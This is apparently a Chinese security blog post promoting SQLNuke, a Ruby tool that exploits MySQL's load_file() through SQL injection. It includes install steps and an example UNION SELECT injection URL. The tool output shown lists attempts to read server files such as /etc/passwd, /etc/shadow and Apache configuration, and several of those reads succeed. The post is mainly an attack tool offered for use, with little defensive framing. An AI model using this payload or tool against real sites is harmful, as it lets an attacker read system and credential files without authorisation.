SQLNuke:MYSQL load_file()函数注入工具

  • A+
所属分类:神兵利刃

SQLNuke是一个功能强大而又简单的MYSQL load_file()函数注入工具。

在Mysql进行SQL注入攻击中,当你需要收集一些服务器的信息,你能想到的最好的方式是从load_file()函数下手,而手工推测的方法会耗费大量的时间,现在SQLNuke可以帮助你使这个过程轻松愉快。

SQLNuke:MYSQL load_file()函数注入工具

依赖:

git

$ sudo apt-get install git-core
$ which git
_/usr/bin/git_
$ git --version
_git version 1.7.0.4_ 

ruby (Ubuntu)

$ sudo apt-get install ruby 

SQLNuke Installation

$ git clone https://github.com/nuke99/sqlnuke.git
$ cd sqlnuke
$ ./sql.rb 

基本用法

root@hakb0x:/sqlnuke# ./sql.rb -u 'http://localhost/index.php?id=-1+UNION+SELECT+1,XxxX,3--'
[!] localhost folder already exists
[!] No OS selected, Continue with all the possibilities
[200] - [Failed]     /etc/apache2/logs/access.log
[200] - [Success]    /etc/hosts
[200] - [Failed]     /home/apache/httpd.conf
[200] - [Failed]     /usr/local/apache2/conf/httpd.conf
[200] - [Failed]     /etc/apache2/vhosts.d/default_vhost.include
[200] - [Failed]     /etc/apache2/apache2.conf
[200] - [Failed]     /opt/apache/conf/httpd.conf
[200] - [Failed]     /usr/local/apache/conf/httpd.conf
[200] - [Failed]     /var/www/vhosts/sitename/httpdocs//etc/init.d/apache
[200] - [Success]    /etc/passwd
[200] - [Failed]     /etc/apache/apache.conf
[200] - [Failed]     /etc/httpd/conf/httpd.conf
[200] - [Failed]     /home/apache/conf/httpd.conf
[200] - [Failed]     /etc/apache2/sites-available/default
[200] - [Failed]     /etc/apache/httpd.conf
[200] - [Failed]     /etc/httpd/access.log
[200] - [Failed]     /etc/apache2/httpd.conf
[200] - [Failed]     /etc/httpd/httpd.conf
[200] - [Failed]     /etc/init.d/apache2/httpd.conf
[200] - [Failed]     /etc/init.d/apache/httpd.conf
[200] - [Success]    /etc/group
[200] - [Failed]     C:/wamp/bin/apache/logs/access.log
[200] - [Failed]     /etc/shadow
....

[+] Saved files are in 'output/localhost'

下载地址

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: